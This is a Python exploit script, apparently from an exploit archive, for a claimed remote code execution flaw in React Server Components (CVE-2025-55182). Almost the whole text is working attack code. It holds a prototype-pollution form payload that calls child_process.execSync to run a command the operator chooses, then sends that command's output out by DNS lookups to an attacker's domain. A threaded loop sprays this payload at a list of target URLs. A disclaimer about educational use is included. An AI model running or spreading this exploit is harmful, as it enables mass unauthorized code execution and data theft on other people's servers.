# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Color definitions
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
END = '\033[0m'
print("""
███████╗██╗ ██╗███╗ ██╗ █████╗ ███████╗██╗ ██╗██████╗
██╔════╝╚██╗ ██╔╝████╗ ██║██╔══██╗██╔════╝╚██╗██╔╝██╔══██╗
██║ ╚████╔╝ ██╔██╗ ██║███████║█████╗ ╚███╔╝ ██████╔╝
██║ ╚██╔╝ ██║╚██╗██║██╔══██║██╔══╝ ██╔██╗ ██╔═══╝
╚███████╗ ██║ ██║ ╚████║██║ ██║███████╗██╔╝ ██╗██║
╚══════╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")
class NoUsageParser(argparse.ArgumentParser):
def error(self, message):
# completely suppress argparse usage
print(f"Error: {message}")
raise SystemExit(1)
parser = NoUsageParser(description="EynaExp Scanner")
parser.add_argument('-d', required=True)
parser.add_argument('-l', required=True)
parser.add_argument('-c', required=True)
print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n")
args = parser.parse_args()
dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
request_body = (
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"0\"\r\n\r\n"
"{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
"\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
"\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
"\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"1\"\r\n\r\n"
"\"$@0\"\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)
def send_request(target_url):
try:
response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
for header_key in ["x-action", "next-action", "rsc"]:
if header_key in response.headers:
result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
return result_message
except Exception as exception:
return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
with open(targets_file_path) as file_handle:
target_urls = [line.strip() for line in file_handle if line.strip()]
print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets — starting multi-thread scan...{Colors.END}\n")
with ThreadPoolExecutor(max_workers=30) as executor:
futures = {executor.submit(send_request, url): url for url in target_urls}
for future in as_completed(futures):
print(future.result())
下一篇:没有了